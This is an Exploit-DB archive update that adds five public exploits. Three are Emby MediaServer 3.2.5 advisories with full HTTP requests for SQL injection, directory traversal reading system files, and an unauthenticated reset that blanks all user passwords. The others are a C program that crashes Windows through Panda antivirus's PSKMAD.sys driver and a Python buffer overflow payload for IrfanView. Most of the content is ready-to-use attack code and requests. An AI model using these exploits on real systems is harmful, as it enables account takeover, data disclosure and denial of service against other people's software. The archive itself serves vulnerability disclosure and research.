DB: 2017-05-01

5 new exploits

Panda Free Antivirus - 'PSKMAD.sys' Denial of Service
IrfanView 4.44 - Denial of Service
Emby MediaServer 3.2.5 - SQL Injection
Emby MediaServer 3.2.5 - Password Reset
Emby MediaServer 3.2.5 - Directory Traversal

files.csv

@@ -5479,6 +5479,8 @@ id,file,description,date,author,platform,type,port
 41931,platforms/multiple/dos/41931.html,"Apple Safari - Array concat Memory Corruption",2017-04-25,"Google Security Research",multiple,dos,0
 41932,platforms/multiple/dos/41932.cpp,"Oracle VirtualBox Guest Additions 5.1.18 -  Unprivileged Windows User-Mode Guest Code Double-Free",2017-04-25,"Google Security Research",multiple,dos,0
 41941,platforms/windows/dos/41941.html,"Microsoft Internet Explorer 11.576.14393.0 - 'CStyleSheetArray::BuildListOfMatchedRules' Memory Corruption",2017-04-27,"Google Security Research",windows,dos,0
+41945,platforms/windows/dos/41945.c,"Panda Free Antivirus - 'PSKMAD.sys' Denial of Service",2017-04-29,"Peter Baris",windows,dos,0
+41949,platforms/windows/dos/41949.py,"IrfanView 4.44 - Denial of Service",2017-04-29,"Dreivan Orprecio",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -37794,3 +37796,6 @@ id,file,description,date,author,platform,type,port
 41940,platforms/php/webapps/41940.py,"TYPO3 News Module - SQL Injection",2017-04-27,"Charles Fol",php,webapps,80
 41943,platforms/php/webapps/41943.py,"Simple File Uploader - Arbitrary File Download",2017-04-27,"Daniel Godoy",php,webapps,0
 41944,platforms/php/webapps/41944.txt,"Easy File Uploader - Arbitrary File Upload",2017-04-27,"Daniel Godoy",php,webapps,0
+41946,platforms/multiple/webapps/41946.txt,"Emby MediaServer 3.2.5 - SQL Injection",2017-04-30,LiquidWorm,multiple,webapps,0
+41947,platforms/multiple/webapps/41947.txt,"Emby MediaServer 3.2.5 - Password Reset",2017-04-30,LiquidWorm,multiple,webapps,0
+41948,platforms/multiple/webapps/41948.txt,"Emby MediaServer 3.2.5 - Directory Traversal",2017-04-30,LiquidWorm,multiple,webapps,0

platforms/multiple/webapps/41946.txt

@@ -0,0 +1,66 @@
+Emby MediaServer 3.2.5 Boolean-based Blind SQL Injection Vulnerability
+
+
+Vendor: Emby LLC
+Product web page: https://www.emby.media
+Affected version: 3.2.5
+                  3.1.5
+                  3.1.2
+                  3.1.1
+                  3.1.0
+                  3.0.0
+
+Summary: Emby (formerly Media Browser) is a media server designed to organize,
+play, and stream audio and video to a variety of devices. Emby is open-source,
+and uses a client-server model. Two comparable media servers are Plex and Windows
+Media Center.
+
+Desc: Emby suffers from a blind SQL injection vulnerability. Input passed via the GET
+parameter 'MediaTypes' is not properly sanitised before being returned to the user
+or used in SQL queries. This can be exploited to manipulate SQL queries by injecting
+arbitrary SQL code.
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN)
+           Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
+           Ubuntu Linux 14.04.5
+           MacOS Sierra 10.12.3
+           SQLite3
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2017-5400
+Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2017-5400.php
+
+SSD Advisory: https://blogs.securiteam.com/index.php/archives/3098
+
+
+22.12.2016
+
+--
+
+
+PoC:
+
+GET /emby/Users/abb355429db54e159ac2a7a3cbd6eb12/Items?ParentId=4cd160cad6c50f34ca42be0136af2316&Filters=IsNotFolder&Recursive=true&SortBy=SortName&MediaTypes=Audio%2cVideo'&Limit=100&Fields=MediaSources%2CChapters&ExcludeLocationTypes=Virtual HTTP/1.1
+Host: 10.211.55.3:8096
+accept: application/json
+x-mediabrowser-token: ba5a68dfa1134bd6af642228bbf757bb
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
+x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome 55.0.2883.87", DeviceId="104a154d5aa8c9576a2508113b47a53b6170253c", Version="3.1.0.0", UserId="abb355429db54e159ac2a7a3cbd6eb12"
+Accept-Encoding: gzip, deflate, sdch
+Accept-Language: en-US,en;q=0.8
+Connection: close
+
+Response:
+
+HTTP/1.1 500 Internal Server Error
+Content-Type: text/html
+Server: Mono-HTTPAPI/1.0
+Date: Tue, 21 Feb 2017 12:06:09 GMT
+Content-Length: 64
+Connection: close
+
+Exception of type 'SQLitePCL.pretty.SQLiteException' was thrown.

platforms/multiple/webapps/41947.txt

@@ -0,0 +1,166 @@
+Emby MediaServer 3.2.5 Password Reset Vulnerability
+
+
+Vendor: Emby LLC
+Product web page: https://www.emby.media
+Affected version: 3.2.5
+                  3.1.5
+                  3.1.2
+                  3.1.1
+                  3.1.0
+                  3.0.0
+
+Summary: Emby (formerly Media Browser) is a media server designed to organize,
+play, and stream audio and video to a variety of devices. Emby is open-source,
+and uses a client-server model. Two comparable media servers are Plex and Windows
+Media Center.
+
+Desc: The issue can be triggered by an unauthenticated actor within the home network
+(LAN) only. The attacker doesn't need to specify a valid username to reset the
+password. He or she can enter a random string, and using the file disclosure issue
+it's possible to read the PIN needed for resetting. This in turn will disclose all
+the valid usernames in the emby server and reset all the passwords for all the users
+with a blank password. Attackers can exploit this to gain unauthenticated and unauthorized
+access to the emby media server management interface.
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN)
+           Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
+           Ubuntu Linux 14.04.5
+           MacOS Sierra 10.12.3
+           SQLite3
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2017-5401
+Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2017-5401.php
+
+SSD Advisory: https://blogs.securiteam.com/index.php/archives/3098
+
+
+22.12.2016
+
+--
+
+
+1. First we initiate the Forgot Password feature from within our home network:
+------------------------------------------------------------------------------
+
+http://10.211.55.3:8096/web/forgotpassword.html
+
+
+2. Then, we type any random username and hit submit:
+----------------------------------------------------
+
+POST /emby/Users/ForgotPassword HTTP/1.1
+Host: 10.211.55.3:8096
+Connection: keep-alive
+Content-Length: 32
+accept: application/json
+Origin: http://10.211.55.3:8096
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
+x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome", DeviceId="3848bd099140288b429e5189456c7354b531fc6b", Version="3.2.5.0"
+content-type: application/x-www-form-urlencoded; charset=UTF-8
+Referer: http://10.211.55.3:8096/web/forgotpassword.html
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.8,mk;q=0.6
+DNT: 1
+
+EnteredUsername=RandomusUsuarius
+
+
+
+3. You will get an alert message (Windows/Linux):
+-------------------------------------------------
+
+The following file has been created on your server and contains instructions on how to proceed:
+
+C:\Users\lqwrm\AppData\Roaming\\Emby-Server\passwordreset.txt
+
+-- OR --
+
+/var/lib/emby-server/passwordreset.txt
+
+
+4. Exploiting the file disclosure vulnerability (ZSL-2017-5403):
+----------------------------------------------------------------
+
+GET /emby/swagger-ui/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Users\lqwrm\AppData\Roaming\Emby-Server\passwordreset.txt HTTP/1.1
+Host: 10.211.55.3:8096
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate, sdch
+Accept-Language: en-US,en;q=0.8
+Connection: close
+
+HTTP/1.1 200 OK
+X-UA-Compatible: IE=Edge
+Access-Control-Allow-Headers: Content-Type, Authorization, Range, X-MediaBrowser-Token, X-Emby-Authorization
+Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS
+Access-Control-Allow-Origin: *
+Vary: Accept-Encoding
+ETag: "c4fd834ac2fc99ff99d74c8e994a8a71"
+Cache-Control: public
+Expires: -1
+Server: Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
+Content-Type: text/plain
+Date: Tue, 28 Feb 2017 12:14:51 GMT
+Content-Length: 164
+Connection: close
+
+Use your web browser to visit:
+
+http://10.211.55.3:8096/web/forgotpasswordpin.html
+
+Enter the following pin code:
+
+6727
+
+The pin code will expire at 91
+
+
+
+5. Following the instructions, entering the PIN, results in resetting all the passwords for all the emby users on the system:
+-----------------------------------------------------------------------------------------------------------------------------
+
+POST /emby/Users/ForgotPassword/Pin HTTP/1.1
+Host: 10.211.55.3:8096
+Connection: keep-alive
+Content-Length: 9
+accept: application/json
+Origin: http://10.211.55.3:8096
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
+x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome", DeviceId="3848bd099140288b429e5189456c7354b531fc6b", Version="3.2.5.0"
+content-type: application/x-www-form-urlencoded; charset=UTF-8
+Referer: http://10.211.55.3:8096/web/forgotpasswordpin.html
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.8,mk;q=0.6
+DNT: 1
+
+Pin=6272
+
+---
+
+We get the message:
+
+Passwords have been removed for the following users. To login, sign in with a blank password.
+
+testingus
+test321
+beebee
+admin
+ztefan
+lio
+miko
+dni
+embyusertest
+joxypoxy
+test123
+thricer
+teppei
+admin2
+delf1na
+

platforms/multiple/webapps/41948.txt

@@ -0,0 +1,157 @@
+Emby MediaServer 3.2.5 Directory Traversal File Disclosure Vulnerability
+
+
+Vendor: Emby LLC
+Product web page: https://www.emby.media
+Affected version: 3.2.5
+                  3.1.5
+                  3.1.2
+                  3.1.1
+                  3.1.0
+                  3.0.0
+
+Summary: Emby (formerly Media Browser) is a media server designed to organize,
+play, and stream audio and video to a variety of devices. Emby is open-source,
+and uses a client-server model. Two comparable media servers are Plex and Windows
+Media Center.
+
+Desc: The vulnerability was confirmed on tested platforms depending on the version.
+Version 3.1.0 is affecting Linux, Windows and Mac platforms. The 3.2.5 only affects
+Windows release. Input passed via the 'swagger-ui' object in SwaggerService.cs is not
+properly verified before being used to load resources. This can be exploited to disclose
+the contents of arbitrary files via directory traversal attacks.
+
+================================================================================
+/Emby.Server.Implementations/HttpServer/SwaggerService.cs:
+----------------------------------------------------------
+
+using MediaBrowser.Controller;
+using MediaBrowser.Controller.Net;
+using System.IO;
+using MediaBrowser.Model.IO;
+using MediaBrowser.Model.Services;
+
+namespace Emby.Server.Implementations.HttpServer
+{
+    public class SwaggerService : IService, IRequiresRequest
+    {
+        private readonly IServerApplicationPaths _appPaths;
+        private readonly IFileSystem _fileSystem;
+
+        public SwaggerService(IServerApplicationPaths appPaths, IFileSystem fileSystem, IHttpResultFactory resultFactory)
+        {
+            _appPaths = appPaths;
+            _fileSystem = fileSystem;
+            _resultFactory = resultFactory;
+        }
+
+        /// <summary>
+        /// Gets the specified request.
+        /// </summary>
+        /// <param name="request">The request.</param>
+        /// <returns>System.Object.</returns>
+        public object Get(GetSwaggerResource request)
+        {
+            var swaggerDirectory = Path.Combine(_appPaths.ApplicationResourcesPath, "swagger-ui");
+
+            var requestedFile = Path.Combine(swaggerDirectory, request.ResourceName.Replace('/', _fileSystem.DirectorySeparatorChar));
+
+            return _resultFactory.GetStaticFileResult(Request, requestedFile).Result;
+        }
+
+        /// <summary>
+        /// Gets or sets the result factory.
+        /// </summary>
+        /// <value>The result factory.</value>
+        private readonly IHttpResultFactory _resultFactory;
+
+        /// <summary>
+        /// Gets or sets the request context.
+        /// </summary>
+        /// <value>The request context.</value>
+        public IRequest Request { get; set; }
+    }
+}
+
+================================================================================
+
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN)
+           Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
+           Ubuntu Linux 14.04.5
+           MacOS Sierra 10.12.3
+           SQLite3
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2017-5403
+Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2017-5403.php
+
+SSD Advisory: https://blogs.securiteam.com/index.php/archives/3098
+
+
+22.12.2016
+
+--
+
+
+GET /emby/swagger-ui/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
+
+HTTP/1.1 200 OK
+X-UA-Compatible: IE=Edge
+Access-Control-Allow-Headers: Content-Type, Authorization, Range, X-MediaBrowser-Token, X-Emby-Authorization
+Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS
+Access-Control-Allow-Origin: *
+Vary: Accept-Encoding
+ETag: "07bec80f76d20d26dd300a855219d321"
+Cache-Control: public
+Server: Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
+Content-Type: application/octet-stream
+Date: Thu, 22 Dec 2016 10:43:53 GMT
+Content-Length: 403
+Connection: close
+
+; for 16-bit app support
+[fonts]
+[extensions]
+[mci extensions]
+[files]
+[Mail]
+MAPI=1
+[MCI Extensions.BAK]
+3g2=MPEGVideo
+3gp=MPEGVideo
+3gp2=MPEGVideo
+3gpp=MPEGVideo
+aac=MPEGVideo
+adt=MPEGVideo
+adts=MPEGVideo
+m2t=MPEGVideo
+m2ts=MPEGVideo
+m2v=MPEGVideo
+m4a=MPEGVideo
+m4v=MPEGVideo
+mod=MPEGVideo
+mov=MPEGVideo
+mp4=MPEGVideo
+mp4v=MPEGVideo
+mts=MPEGVideo
+ts=MPEGVideo
+tts=MPEGVideo
+
+==========================
+
+On Linux:
+
+http://127.0.0.1/%2femby%2fswagger-ui%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+...
+...

platforms/windows/dos/41945.c

@@ -0,0 +1,89 @@
+/*
+# Exploit Title: Panda Cloud Antivirus Free - 'PSKMAD.sys' - BSoD - denial of service
+# Date: 2017-04-29
+# Exploit Author: Peter baris
+# Vendor Homepage: http://www.saptech-erp.com.au
+# Software Link: http://download.cnet.com/Panda-Cloud-Antivirus-Free-Edition/3000-2239_4-10914099.html?part=dl-&subj=dl&tag=button&lang=en
+# Version: 18.0
+# Tested on: Windows 7 SP1 Pro x64, Windows 10 Pro x64
+# CVE : requested
+*/
+
+#include "stdafx.h"
+#include <stdio.h>
+#include <Windows.h>
+#include <winioctl.h>
+
+
+#define DEVICE_NAME L"\\\\.\\PSMEMDriver"
+
+LPCTSTR FileName = (LPCTSTR)DEVICE_NAME;
+HANDLE GetDeviceHandle(LPCTSTR FileName) {
+	HANDLE hFile = NULL;
+
+	hFile = CreateFile(FileName,
+		GENERIC_READ | GENERIC_WRITE,
+		0,
+		0,
+		OPEN_EXISTING,
+		NULL,
+		0);
+
+	return hFile;
+}
+
+int main()
+{
+
+	HANDLE hFile = NULL;
+	PVOID64 lpInBuffer = NULL;
+	ULONG64 lpBytesReturned;
+	PVOID64 BuffAddress = NULL;
+	SIZE_T BufferSize = 0x800;
+	
+	printf("Trying the get the handle for the PSMEMDriver device.\r\n");
+	
+	hFile = GetDeviceHandle(FileName);
+
+	if (hFile == INVALID_HANDLE_VALUE) {
+		printf("Can't get the device handle, no BSoD today. 0x%X\r\n", GetLastError());
+		return 1;
+	}
+
+	// Allocate memory for our buffer
+	lpInBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+	
+
+	if (lpInBuffer == NULL) {
+		printf("VirtualAlloc() failed. \r\n");
+		return 1;
+	}
+	
+
+	BuffAddress = (PVOID64)(((ULONG64)lpInBuffer));
+	*(PULONG64)BuffAddress = (ULONG64)0x542DF91B; //Pool header tag???
+	BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x4));
+	*(PULONG64)BuffAddress = (ULONG64)0x42424242;
+	BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x8));
+	
+	RtlFillMemory(BuffAddress, BufferSize-0x8 , 0x41);
+
+
+
+		DeviceIoControl(hFile,
+			0xb3702c38,
+			lpInBuffer,
+			NULL,  //Change it to BufferSize and put a bp PSKMAD+3150 -> rax will point to our buffer in the kernel memory
+			NULL,
+			NULL,
+			&lpBytesReturned,
+			NULL);
+
+	/*This part is pretty much useless, just wanted to be nice in case the machine survives.*/
+	printf("Cleaning up.\r\n");
+	VirtualFree((LPVOID)lpInBuffer, sizeof(lpInBuffer), MEM_RELEASE);
+	CloseHandle(hFile);
+	printf("Resources freed up.\r\n");
+    return 0;
+}
+

platforms/windows/dos/41949.py

@@ -0,0 +1,30 @@
+# Exploit Title: Irfanview - OtherExtensions Input Overflow
+# Date: 29-04-2017
+# Software Link: http://download.cnet.com/IrfanView/?part=dl-&subj=dl&tag=button
+# Exploit Author: Dreivan Orprecio
+#Version: Irfanview 4.44
+#Irfanview is vulnerable to overflow in "OtherExtensions" input field
+#Debugging Machine: WinXP Pro SP3 (32bit)
+
+
+#POC
+
+#!usr/bin/python
+
+
+      eip = "\xf7\x56\x44\x7e" #jmp esp from user32.dll
+
+
+
+      buffer = "OtherExtensions="+"A" *  199 + eip + "\xcc" 
+
+      print buffer              #a) irfanview->Option->Properties/Settings->Extensions
+                                #b) Paste the buffer in the "other" input then press ok, repeat a) and b)
+
+
+
+
+
+#badcharacters: those instruction that start with 6,7,8,E,F 
+#Only 43 bytes space to host a shellcode and lots of badchars make it hard for this to exploit
+#Any other way around this?